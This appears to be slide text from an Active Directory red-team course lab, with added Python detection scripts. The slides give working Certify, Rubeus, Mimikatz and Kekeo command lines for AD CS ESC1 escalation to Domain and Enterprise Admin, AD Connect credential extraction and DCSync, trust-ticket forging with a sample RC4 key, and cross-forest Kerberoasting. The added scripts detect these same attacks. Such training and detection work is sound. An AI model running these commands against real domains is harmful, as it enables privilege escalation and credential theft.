https://www.blackhat.com/docs/us-14/materials/us-14-Duckwall-Abusing-Microsoft-
Kerberos-Sorry-You-Guys-Don%27t-Get-It.pdf
http://passing-the-hash.blogspot.com/2014/09/pac-validation-20-minute-rule-
and.html


The krbtgt hash can also be extracted from NTDS.dit.


List of SPNs: https://adsecurity.org/?page_id=183


Domain Persistence - Diamond Ticket


• A diamond ticket is created by decrypting a valid TGT, making changes to
  it and re-encrypting it using the AES keys of the krbtgt account.
• A golden ticket is a TGT forging attack, whereas a diamond ticket is a TGT
  modification attack.
• Once again, the persistence lifetime depends on the krbtgt account.
• A diamond ticket is more opsec safe because:
  – Its ticket times are valid, since a TGT actually issued by the DC is modified
  – It has a corresponding TGT request on the DC. With a golden ticket there is
    no TGT request corresponding to the TGS/service ticket requests, as the TGT
    is forged.
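The last bullet is the detection angle a defender can act on: a forged (golden) TGT produces service-ticket requests (event 4769) with no earlier TGT request (event 4768) for the same account from the same client, while a diamond ticket, being a DC-issued TGT that was modified, leaves a 4768 behind. The following is an added example, not code from the course, that applies that correlation over a constructed batch of normalised Kerberos audit events; the event field names and the 10-hour TGT lifetime are assumptions for the example.

```python
"""Added example (not from the course slides): flag 4769 service-ticket
requests that have no preceding 4768 TGT request for the same account and
client within the TGT lifetime. The sample events below are constructed."""
from datetime import datetime, timedelta

# Constructed sample of Kerberos audit events as a SIEM might normalise them.
# A real pipeline would feed Security log events 4768/4769 here.
SAMPLE_EVENTS = [
    {"time": "2023-05-01T08:00:00", "id": 4768, "user": "alice", "client": "10.0.0.15"},
    {"time": "2023-05-01T08:00:05", "id": 4769, "user": "alice", "client": "10.0.0.15",
     "service": "cifs/us-file"},
    # No 4768 exists for this account/client at all: the shape a forged TGT leaves.
    {"time": "2023-05-01T08:02:00", "id": 4769, "user": "Administrator", "client": "10.0.0.99",
     "service": "ldap/us-dc"},
    {"time": "2023-05-01T09:30:00", "id": 4768, "user": "bob", "client": "10.0.0.20"},
    # 4768 exists but is older than any legitimate TGT could be.
    {"time": "2023-05-02T09:31:00", "id": 4769, "user": "bob", "client": "10.0.0.20",
     "service": "http/us-web"},
]

# Assumed domain policy value ("Maximum lifetime for user ticket"); adjust to yours.
TGT_LIFETIME = timedelta(hours=10)


def _parse(ts):
    return datetime.fromisoformat(ts)


def find_orphan_tgs_requests(events, tgt_lifetime=TGT_LIFETIME):
    """Return the 4769 events with no 4768 for the same (user, client) inside
    the TGT lifetime. Each orphan needs triage: either the TGT was issued before
    the log window (or renewed), or no DC ever issued it."""
    last_tgt = {}  # (user, client) -> time of the most recent 4768
    orphans = []
    for ev in sorted(events, key=lambda e: _parse(e["time"])):
        key = (ev["user"].lower(), ev["client"])
        t = _parse(ev["time"])
        if ev["id"] == 4768:
            last_tgt[key] = t
        elif ev["id"] == 4769:
            issued = last_tgt.get(key)
            if issued is None or t - issued > tgt_lifetime:
                orphans.append(ev)
    return orphans


if __name__ == "__main__":
    for ev in find_orphan_tgs_requests(SAMPLE_EVENTS):
        print("orphan TGS request:", ev["time"], ev["user"], ev["client"], ev["service"])
```

Run over the constructed sample, the check reports the Administrator request (no TGT request at all) and bob's request (TGT request older than the lifetime) and leaves alice alone. As the slide says, a diamond ticket does not trip this correlation, since its TGT was genuinely requested; for that case the modified ticket contents (for example group membership in the PAC that the account does not hold) are the thing to compare against directory data.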


https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/
https://www.trustedsec.com/blog/a-diamond-in-the-ruff/



http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-
malware-analysis/


https://adsecurity.org/?p=1785
https://adsecurity.org/?p=1714


https://msdn.microsoft.com/en-
us/library/windows/desktop/aa380502(v=vs.85).aspx
https://attack.mitre.org/wiki/Technique/T1101


https://docs.microsoft.com/en-us/previous-versions/technet-
magazine/ee361593(v=msdn.10)
https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-
practices/appendix-c--protected-accounts-and-groups-in-active-directory
https://adsecurity.org/?p=1906


https://www.ossir.org/paris/supports/2017/2017-04-11/2017-04-
11_Active_directory_v2.5.pdf


Ref for PowerView command: http://www.harmj0y.net/blog/redteaming/abusing-active-directory-permissions-with-powerview/


https://gallery.technet.microsoft.com/Invoke-SDPropagator-to-c99ae41c


Reference: https://msdn.microsoft.com/en-
us/library/windows/desktop/aa374928(v=vs.85).aspx


https://github.com/samratashok/RACE
https://github.com/samratashok/nishang/tree/master/Backdoors
https://blogs.msdn.microsoft.com/wmi/2009/07/20/scripting-wmi-namespace-
security-part-1-of-3/


https://github.com/HarmJ0y/DAMP
https://posts.specterops.io/remote-hash-extraction-on-demand-via-host-security-
descriptor-modification-2cf505ec5c40


Cross Trust Attacks


• We now have Domain Admin privileges in the us.techcorp.local domain.
• Let's discuss attacks across domain trusts and forest trusts.


Cross Domain Attacks – AD CS


• Active Directory Certificate Services (AD CS) enables the use of a Public Key
  Infrastructure (PKI) in an Active Directory forest.
• AD CS helps in authenticating users and machines, and in encrypting and
  signing documents, filesystems, emails and more.
• "AD CS is the Server Role that allows you to build a public key
  infrastructure (PKI) and provide public key cryptography, digital
  certificates, and digital signature capabilities for your organization."


https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-
server-2012-r2-and-2012/hh831740(v=ws.11)


Cross Domain Attacks – AD CS - Terminology


• CA - The certification authority that issues certificates. The server with the AD CS
  role (a DC or a separate server) is the CA.
• Certificate - Issued to a user or machine and can be used for authentication,
  encryption, signing etc.
• CSR - Certificate Signing Request made by a client to the CA to request a
  certificate.
• Certificate Template - Defines the settings for a certificate. Contains information
  such as enrollment permissions, EKUs, expiry etc.
• EKU OIDs - Extended Key Usage Object Identifiers. These dictate what certificates
  issued from a template can be used for (Client Authentication, Smart Card Logon, SubCA etc.)



Cross Domain Attacks – AD CS - Example

[Diagram not reproduced in this extraction]
Diagram source - https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf


Cross Domain Attacks – AD CS - Abuse


• There are various ways of abusing AD CS! (See the link to the "Certified Pre-
  Owned" paper in the slide notes):
– Extract user and machine certificates
– Use certificates to retrieve NTLM hash
– User and machine level persistence
– Escalation to Domain Admin and Enterprise Admin
– Domain persistence
• We will not discuss all of the techniques!

See pages 4 and 5 for a summary of the attack techniques -
https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf


Cross Domain Attacks – AD CS - Abuse

• Stealing Certificates
  – THEFT1 - Export certs with private keys using Windows' crypto APIs
  – THEFT2 - Extracting user certs with private keys using DPAPI
  – THEFT3 - Extracting machine certs with private keys using DPAPI
  – THEFT4 - Steal certificates from files and stores
  – THEFT5 - Use Kerberos PKINIT to get NTLM hash
• Persistence
  – PERSIST1 - User persistence by requesting new certs
  – PERSIST2 - Machine persistence by requesting new certs
  – PERSIST3 - User/Machine persistence by renewing certs


Cross Domain Attacks – AD CS - Abuse

• Escalation
  – ESC1 - Enrollee can request cert for ANY user
  – ESC2 - Any purpose or no EKU (potentially dangerous)
  – ESC3 - Request an enrollment agent certificate and use it to request cert on
    behalf of ANY user
  – ESC4 - Overly permissive ACLs on templates
  – ESC5 - Poor access control on CA server, CA server computer object etc.
  – ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 setting on CA - Request certs for
    ANY user
  – ESC7 - Poor access control on roles on CA authority like "CA Administrator"
    and "Certificate Manager"
  – ESC8 - NTLM relay to HTTP enrollment endpoints
• Domain Persistence
  – DPERSIST1 - Forge certificates with stolen CA private keys
  – DPERSIST2 - Malicious root/intermediate CAs
  – DPERSIST3 - Backdoor CA Server, CA server computer object etc.


Cross Domain Attacks – AD CS - Enumeration


• We can use the Certify tool (https://github.com/GhostPack/Certify) to
  enumerate AD CS in the target forest (and to perform other attacks):
  Certify.exe cas

• Enumerate the templates:
  Certify.exe find

• Enumerate vulnerable templates:
  Certify.exe find /vulnerable


Priv Esc - Across domain trusts – AD CS


• Common requirements/misconfigurations for all of the escalations:
  – The CA grants normal/low-privileged users enrollment rights
  – Manager approval is disabled
  – Authorization signatures are not required
  – The target template grants normal/low-privileged users enrollment
    rights


Cross Domain Attacks – AD CS - Escalation


• In techcorp, the user pawadmin has enrollment rights to a template -
  ForAdminsofPrivilegedAccessWorkstations
• The template has the ENROLLEE_SUPPLIES_SUBJECT flag set in
  msPKI-Certificate-Name-Flag. (ESC1)
• This means pawadmin can request a certificate for ANY user.
• Note that this template does not show up when we enumerate vulnerable
  templates in Certify. Use:
  Certify.exe find
  Certify.exe find /enrolleeSuppliesSubject
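The common requirements listed two slides earlier and the ENROLLEE_SUPPLIES_SUBJECT case on this slide are both checkable from template attributes alone, which is what makes them auditable before an attacker finds them. The block below is an added example, not code from Certify or from the course, that evaluates constructed certificate template records against those conditions: subject supplied by the enrollee, an authentication-capable EKU, no manager approval, no authorized signatures required. It also reports who can enroll, since (as the slide notes) a template granted to a single user such as pawadmin is just as exploitable yet is not "vulnerable" by the low-privileged-group test. The flag bits and EKU OIDs are the documented AD CS values; the template records, the `enroll` field and the low-privileged group list are assumptions for the example.

```python
"""Added example, not Certify's or the course's code: audit certificate
template records for the ESC1 conditions. The records below are constructed;
in practice they come from an LDAP query of the Certificate Templates container
in the Configuration partition."""

# Bit in msPKI-Certificate-Name-Flag: the requester supplies the subject/SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# Bit in msPKI-Enrollment-Flag: issuance requires CA certificate manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs with which an issued certificate can authenticate a principal via PKINIT.
# A template with no EKU at all is the separate ESC2 case and is not flagged here.
AUTH_EKU_OIDS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Groups treated as low privileged for the audit (assumption for this example).
LOW_PRIV_GROUPS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

# Constructed template records; attribute names follow the AD schema, "enroll"
# is a simplified view of the template's enrollment ACEs.
SAMPLE_TEMPLATES = [
    {"cn": "User", "msPKI-Certificate-Name-Flag": 0xA2200000,
     "msPKI-Enrollment-Flag": 0x29, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
    {"cn": "ForAdminsofPrivilegedAccessWorkstations",
     "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll": ["pawadmin"]},
    {"cn": "WebServer", "msPKI-Certificate-Name-Flag": 0x1,
     "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"], "enroll": ["Domain Computers"]},
    {"cn": "VPNAccess", "msPKI-Certificate-Name-Flag": 0x1,
     "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
    {"cn": "ManagerApproved", "msPKI-Certificate-Name-Flag": 0x1,
     "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll": ["Domain Users"]},
]


def template_allows_subject_spoofing(t):
    """True when a requester can put an arbitrary identity into a certificate
    that is then usable for logon: subject supplied by the enrollee, an
    authentication EKU, no manager approval and no authorized signatures."""
    supplies_subject = t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    needs_approval = t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS
    needs_signatures = t["msPKI-RA-Signature"] > 0
    auth_eku = bool(AUTH_EKU_OIDS & set(t["pKIExtendedKeyUsage"]))
    return bool(supplies_subject) and auth_eku and not needs_approval and not needs_signatures


def audit_esc1(templates, low_priv=LOW_PRIV_GROUPS):
    """List every template meeting the conditions above, with who can enroll and
    whether any low-privileged group is among them (the classic ESC1 finding).
    Templates granted only to named users still appear, so they can be reviewed."""
    findings = []
    for t in templates:
        if not template_allows_subject_spoofing(t):
            continue
        enrollers = set(t["enroll"])
        findings.append({
            "template": t["cn"],
            "enrollers": sorted(enrollers),
            "low_priv_enrollment": bool(enrollers & low_priv),
        })
    return findings


if __name__ == "__main__":
    for f in audit_esc1(SAMPLE_TEMPLATES):
        print(f["template"], "enroll:", ", ".join(f["enrollers"]),
              "| low-priv enrollment:", f["low_priv_enrollment"])
```

On the constructed data the audit reports VPNAccess as a low-privileged ESC1 finding and ForAdminsofPrivilegedAccessWorkstations as a subject-spoofable template whose only enroller is a named user, the same split Certify draws between `find /vulnerable` and `find /enrolleeSuppliesSubject`. The fix on the template side is any one of the four conditions: clear the flag, require manager approval or an authorized signature, or restrict enrollment.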


Cross Domain Attacks – AD CS - Escalation


• We have the certificate of pawadmin that we extracted from us-jump.
  (THEFT4)
• Use the certificate to request a TGT for pawadmin and inject it:
  C:\AD\Tools\Rubeus.exe asktgt /user:pawadmin /certificate:C:\AD\Tools\pawadmin.pfx /password:SecretPass@123 /nowrap /ptt


Cross Domain Attacks – AD CS - Escalation to DA


• Request a certificate for DA!
  C:\AD\Tools\Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator

• Convert from cert.pem to pfx:
  C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\DA.pfx

• Request DA TGT and inject it:
  C:\AD\Tools\Rubeus.exe asktgt /user:Administrator /certificate:C:\AD\Tools\DA.pfx /password:SecretPass@123 /nowrap /ptt


Cross Domain Attacks – AD CS - Escalation to EA


• Request a certificate for EA!
  C:\AD\Tools\Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator

• Convert from cert.pem to pfx:
  C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\EA.pfx

• Request EA TGT and inject it:
  C:\AD\Tools\Rubeus.exe asktgt /user:techcorp.local\Administrator /dc:techcorp-dc.techcorp.local /certificate:C:\AD\Tools\EA.pfx /password:SecretPass@123 /nowrap /ptt



https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-
for-takeover-8ee1a53566ab


Cross Domain Attacks - Attacking Azure AD Integration

• Azure AD is a popular method to extend identity management from on-
premises AD to Microsoft's Azure offerings.
• Many enterprises use their on-prem AD identities to access Azure
applications.
• "A single user identity for authentication and authorization to all
resources, regardless of location…is hybrid identity."


https://docs.microsoft.com/en-us/azure/active-directory/hybrid/


Cross Domain Attacks - Attacking Azure AD Integration

• An on-premises AD can be integrated with Azure AD using Azure AD
Connect with the following methods:
– Password Hash Sync (PHS)
– Pass-Through Authentication (PTA)
– Federation
• Azure AD Connect is installed on-premises and has a high privilege
account both in on-premises AD and in Azure AD!


Cross Domain Attacks - Attacking Azure AD Integration

• Let's target PHS.
• It shares users and their password hashes from on-premises AD with Azure AD.
• A new user, MSOL_, is created which has synchronization rights (DCSync) on the domain!


https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs


Cross Domain Attacks - Attacking Azure AD Integration - PHS

• Enumerate the PHS account and server where AD Connect is installed.
• Using PowerView:
Get-DomainUser -Identity "MSOL_*" -Domain techcorp.local

• Using the ActiveDirectory module:
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Server techcorp.local -Properties * | select SamAccountName,Description | fl


Cross Domain Attacks - Attacking Azure AD Integration - PHS

• We already have administrative access to us-adconnect as helpdeskadmin.
• With administrative privileges, if we run adconnect.ps1, we can extract
the credentials of the MSOL_ account used by AD Connect in clear-text:
.\adconnect.ps1
Note that the above script's code runs powershell.exe, so verbose logs (like transcripts) will be there.
• With the password, we can run commands as MSOL_:
runas /user:techcorp.local\MSOL_16fb75d0227d /netonly cmd


https://blog.xpnsec.com/azuread-connect-for-redteam/


Cross Domain Attacks - Attacking Azure AD Integration - PHS

• And can then execute the DCSync attack:
Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:techcorp\krbtgt /domain:techcorp.local"'
• Please note that because AD Connect synchronizes hashes every two
minutes, in an enterprise environment the MSOL_ account will be excluded
from tools like MDI! This allows us to run DCSync without any alerts!
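As the defender's counterpart to the point above, an added example (not course material) that attributes replication requests to a source host from Windows Security events 4662 and 4624, so an MSOL_ account replicating from anywhere other than the AD Connect server is flagged even where MDI would exclude it. The event lines, addresses and allowlist are constructed; the MSOL_ account name is the lab's.

```python
"""Attribute directory-replication requests (DCSync) to a source host.

Added example, not part of the course material. The event lines below are
constructed; their field names follow Windows Security events 4662 (operation
performed on an AD object) and 4624 (logon), and the two GUIDs are the
documented control access rights for directory replication. A 4662 event
carries no network address, so it is joined to the 4624 logon with the same
logon ID to learn where the request came from.
"""
from dataclasses import dataclass

# Control access rights a replication client exercises against the domain head.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = (DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL)

# Accounts that may replicate, and the hosts they may do it from. Constructed for
# the lab in the text: the MSOL_ account is only legitimate from us-adconnect,
# and domain controllers replicate among themselves.
REPLICATION_ALLOWLIST = {
    "MSOL_16fb75d0227d": {"192.168.1.55"},   # constructed address of us-adconnect
    "US-DC$": {"192.168.1.10"},              # constructed address of us-dc
}


@dataclass(frozen=True)
class Finding:
    account: str
    source_ip: str
    reason: str


def parse_event(line: str) -> dict:
    """Parse one 'Key=Value Key=Value' line of the constructed export format."""
    return dict(field.split("=", 1) for field in line.split())


def is_replication_request(event: dict) -> bool:
    """True for a 4662 whose Properties include a replication control right."""
    props = event.get("Properties", "").lower()
    return event.get("EventID") == "4662" and any(g in props for g in REPLICATION_RIGHTS)


def detect_dcsync(lines) -> list:
    """Return a Finding for every replication request not covered by the allowlist."""
    events = [parse_event(line) for line in lines if line.strip()]
    # Logon ID -> source address from 4624; 4662.SubjectLogonId equals 4624.TargetLogonId.
    logon_source = {
        e["TargetLogonId"]: e.get("IpAddress", "-")
        for e in events if e.get("EventID") == "4624"
    }
    findings = []
    for e in events:
        if not is_replication_request(e):
            continue
        account = e["SubjectUserName"]
        source = logon_source.get(e["SubjectLogonId"], "unknown")
        allowed_hosts = REPLICATION_ALLOWLIST.get(account)
        if allowed_hosts is None:
            findings.append(Finding(account, source, "replication right used by an account outside the allowlist"))
        elif source not in allowed_hosts:
            findings.append(Finding(account, source, "allowlisted replication account used from an unexpected host"))
    return findings


# Constructed sample: the AD Connect account replicating from its own server (normal),
# the same account used from another workstation (the runas /netonly scenario above),
# a helpdesk admin exercising a replication right, routine DC-to-DC replication, and
# an unrelated 4662 on a user object (non-replication GUID) that must be ignored.
SAMPLE_EVENTS = [
    "EventID=4624 TargetUserName=MSOL_16fb75d0227d TargetDomainName=TECHCORP TargetLogonId=0x3e7a1 LogonType=3 IpAddress=192.168.1.55",
    "EventID=4662 SubjectUserName=MSOL_16fb75d0227d SubjectDomainName=TECHCORP SubjectLogonId=0x3e7a1 ObjectType=domainDNS Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} AccessMask=0x100",
    "EventID=4624 TargetUserName=MSOL_16fb75d0227d TargetDomainName=TECHCORP TargetLogonId=0x5b2c0 LogonType=3 IpAddress=192.168.1.90",
    "EventID=4662 SubjectUserName=MSOL_16fb75d0227d SubjectDomainName=TECHCORP SubjectLogonId=0x5b2c0 ObjectType=domainDNS Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} AccessMask=0x100",
    "EventID=4624 TargetUserName=helpdeskadmin TargetDomainName=US TargetLogonId=0x5b300 LogonType=3 IpAddress=192.168.1.90",
    "EventID=4662 SubjectUserName=helpdeskadmin SubjectDomainName=US SubjectLogonId=0x5b300 ObjectType=domainDNS Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} AccessMask=0x100",
    "EventID=4624 TargetUserName=US-DC$ TargetDomainName=US TargetLogonId=0x7c001 LogonType=3 IpAddress=192.168.1.10",
    "EventID=4662 SubjectUserName=US-DC$ SubjectDomainName=US SubjectLogonId=0x7c001 ObjectType=domainDNS Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} AccessMask=0x100",
    "EventID=4662 SubjectUserName=helpdeskadmin SubjectDomainName=US SubjectLogonId=0x5b300 ObjectType=user Properties={bf967aba-0de6-11d0-a285-00aa003049e2} AccessMask=0x10",
]

if __name__ == "__main__":
    for f in detect_dcsync(SAMPLE_EVENTS):
        print(f"{f.account:<22} from {f.source_ip:<14} {f.reason}")
```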


Cross Domain Attacks – Forest Root


• sIDHistory is a user attribute designed for scenarios where a user is
moved from one domain to another. When a user's domain is changed,
they get a new SID and the old SID is added to sIDHistory.
• sIDHistory can be abused in two ways to escalate privileges within a
forest:
– krbtgt hash of the child
– Trust tickets
• All the privilege escalation paths to techcorp.local we have seen till now
need some misconfiguration. These ones are 'working as intended'.


Child to Forest Root Trust Flow


Child to Forest Root Trust Flow Abuse


Cross Domain Attacks – Child to Forest Root - Trust Key

• So, what is required to forge trust tickets is, obviously, the trust key.
Look for the [In] trust key from child to parent.
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName us-dc
or
Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\techcorp$"'
or
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
• We can also use any of the earlier discussed tools to extract trust keys.


https://adsecurity.org/?p=1588


Cross Domain Attacks – Child to Forest Root - Trust Key

• Let's forge an inter-realm TGT:
Invoke-Mimikatz -Command '"kerberos::golden /domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708 /sids:S-1-5-21-2781415573-3701854478-2406986946-519 /rc4:b59ef5860ce0aa12429f4f61c8e51979 /user:Administrator /service:krbtgt /target:techcorp.local /ticket:C:\AD\Tools\trust_tkt.kirbi"'


Cross Domain Attacks – Child to Forest Root - Trust Key

Invoke-Mimikatz -Command

kerberos::golden                                       The mimikatz module
/domain:us.techcorp.local                              FQDN of the current domain
/sid:S-1-5-21-210670787-2521448726-163245708           SID of the current domain
/sids:S-1-5-21-2781415573-3701854478-2406986946-519    SID of the Enterprise Admins group of the parent domain
/rc4:b59ef5860ce0aa12429f4f61c8e51979                  RC4 of the trust key
/user:Administrator                                    User to impersonate
/service:krbtgt                                        Target service in the parent domain
/target:techcorp.local                                 FQDN of the parent domain
/ticket:C:\AD\Tools\kekeo\trust_tkt.kirbi              Path where the ticket is to be saved


Cross Domain Attacks – Child to Forest Root - Trust Key

• Get a TGS for a service (CIFS below) in the target domain by using the
forged trust ticket with Kekeo (https://github.com/gentilkiwi/kekeo/):
tgs::ask /tgt:C:\AD\Tools\trust_tkt.kirbi /service:CIFS/techcorp-dc.techcorp.local
Or, using the older version of Kekeo:
.\asktgs.exe C:\AD\Tools\trust_tkt.kirbi CIFS/techcorp-dc.techcorp.local

• Tickets for other services (like HOST and RPCSS for WMI, HTTP for
PowerShell Remoting and WinRM) can be created as well.


List of Active Directory SPNs https://adsecurity.org/?page_id=183


Cross Domain Attacks – Child to Forest Root - Trust Key

• Use the TGS to access the targeted service (may need to use it twice).
misc::convert lsa
[email protected]_krbtgt~TECHCORP.LOCA
[email protected]
Or
.\kirbikator.exe lsa .\CIFS.techcorp-dc.techcorp.local.kirbi

ls \\techcorp-dc.techcorp.local\c$


Cross Domain Attacks – Child to Forest Root - Trust Key

• Using Rubeus:
.\Rubeus.exe asktgs /ticket:C:\AD\Tools\trust_tkt.kirbi /service:cifs/techcorp-dc.techcorp.local /dc:techcorp-dc.techcorp.local /ptt

ls \\techcorp-dc.techcorp.local\c$

http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/


Cross Forest Attacks


• We now have Enterprise Admin privileges in the techcorp.local forest.
• Let's discuss some techniques to move across forest trusts.


Cross Forest Attacks - Kerberoast


• It is possible to execute Kerberoast across forest trusts.
• Let's enumerate named service accounts across forest trusts.
• Using PowerView:
Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'} | %{Get-DomainUser -SPN -Domain $_.TargetName}
• Using the ActiveDirectory module:
Get-ADTrust -Filter 'IntraForest -ne $true' | %{Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName -Server $_.Name}


Cross Forest Attacks - Kerberoast


• Request a TGS:
C:\AD\Tools\Rubeus.exe kerberoast /user:storagesvc /simple /domain:eu.local /outfile:euhashes.txt
• Check for the TGS:
klist
• Crack using John:
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt

• Request a TGS across the trust using PowerShell:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList MSSQLSvc/[email protected]
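An added detection example for the defending side (not course material): it scans constructed Windows Security event 4769 lines, as logged on the DC that owns the service, for RC4 service ticket requests against user-backed SPNs and marks requests whose client realm is a foreign forest. The realm names, account names and addresses are constructed for the lab layout in the text.

```python
"""Flag Kerberoast-style service ticket requests, including ones that arrive
over a forest trust.

Added example, not part of the course material. The event lines are
constructed; their field names follow Windows Security event 4769 (Kerberos
service ticket requested) as logged on the DC of the realm that owns the
service. Heuristic: an RC4-HMAC ticket (TicketEncryptionType 0x17) for a
service that runs under a user account (ServiceName without a trailing '$'
and not krbtgt), which is the ticket an attacker needs for offline cracking.
TargetDomainName is treated as the requester's realm, so a requester that
came in through a trust is marked cross_realm, and a requester collecting
several such tickets in one batch is marked bulk.
"""
from collections import defaultdict
from dataclasses import dataclass

RC4_HMAC = "0x17"
BULK_THRESHOLD = 3   # distinct roastable services per requester in the window


@dataclass(frozen=True)
class Finding:
    requester: str
    realm: str
    service: str
    source_ip: str
    cross_realm: bool
    bulk: bool


def parse_event(line: str) -> dict:
    """Parse one 'Key=Value Key=Value' line of the constructed export format."""
    return dict(field.split("=", 1) for field in line.split())


def is_roastable_request(event: dict) -> bool:
    """Successful 4769, RC4 ticket, for an SPN not backed by a computer account."""
    service = event.get("ServiceName", "")
    return (event.get("EventID") == "4769"
            and event.get("Status") == "0x0"
            and event.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and not service.endswith("$")
            and service.lower() != "krbtgt")


def detect_kerberoast(lines, local_realm: str) -> list:
    """One Finding per roastable request; bulk is set when the requester asked
    for BULK_THRESHOLD or more distinct roastable services."""
    events = [parse_event(line) for line in lines if line.strip()]
    hits = [e for e in events if is_roastable_request(e)]
    services_per_requester = defaultdict(set)
    for e in hits:
        services_per_requester[e["TargetUserName"]].add(e["ServiceName"].lower())
    findings = []
    for e in hits:
        requester = e["TargetUserName"]
        realm = e.get("TargetDomainName", "").upper()
        findings.append(Finding(
            requester=requester,
            realm=realm,
            service=e["ServiceName"],
            source_ip=e.get("IpAddress", "-"),
            cross_realm=realm != local_realm.upper(),
            bulk=len(services_per_requester[requester]) >= BULK_THRESHOLD,
        ))
    return findings


# Constructed sample as seen on eu-dc (realm EU.LOCAL): a user from the
# us.techcorp.local forest pulling RC4 tickets for three user-backed SPNs, then
# local activity the heuristic must ignore (AES ticket, computer-account service,
# TGT request) and one local RC4 request that is flagged but not bulk.
SAMPLE_EVENTS = [
    "EventID=4769 TargetUserName=studentuser@us.techcorp.local TargetDomainName=US.TECHCORP.LOCAL ServiceName=storagesvc TicketEncryptionType=0x17 IpAddress=::ffff:192.168.1.90 Status=0x0",
    "EventID=4769 TargetUserName=studentuser@us.techcorp.local TargetDomainName=US.TECHCORP.LOCAL ServiceName=mssqlsvc TicketEncryptionType=0x17 IpAddress=::ffff:192.168.1.90 Status=0x0",
    "EventID=4769 TargetUserName=studentuser@us.techcorp.local TargetDomainName=US.TECHCORP.LOCAL ServiceName=websvc TicketEncryptionType=0x17 IpAddress=::ffff:192.168.1.90 Status=0x0",
    "EventID=4769 TargetUserName=euuser@eu.local TargetDomainName=EU.LOCAL ServiceName=storagesvc TicketEncryptionType=0x12 IpAddress=::ffff:192.168.2.40 Status=0x0",
    "EventID=4769 TargetUserName=euuser@eu.local TargetDomainName=EU.LOCAL ServiceName=EU-FILE$ TicketEncryptionType=0x17 IpAddress=::ffff:192.168.2.40 Status=0x0",
    "EventID=4769 TargetUserName=euuser@eu.local TargetDomainName=EU.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:192.168.2.40 Status=0x0",
    "EventID=4769 TargetUserName=legacyapp@eu.local TargetDomainName=EU.LOCAL ServiceName=storagesvc TicketEncryptionType=0x17 IpAddress=::ffff:192.168.2.41 Status=0x0",
]

if __name__ == "__main__":
    for f in detect_kerberoast(SAMPLE_EVENTS, "eu.local"):
        tags = ("cross-realm " if f.cross_realm else "") + ("bulk" if f.bulk else "")
        print(f"{f.requester:<32} {f.service:<12} from {f.source_ip:<22} {tags}")
```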


Cross Forest Attacks - Unconstrained Delegation


• Recall the Printer bug and its abuse from a machine with Unconstrained
Delegation.
• We have used it to escalate privileges to Domain Admin and Enterprise
Admin.
• It also works across a Two-way forest trust with TGT Delegation
enabled!
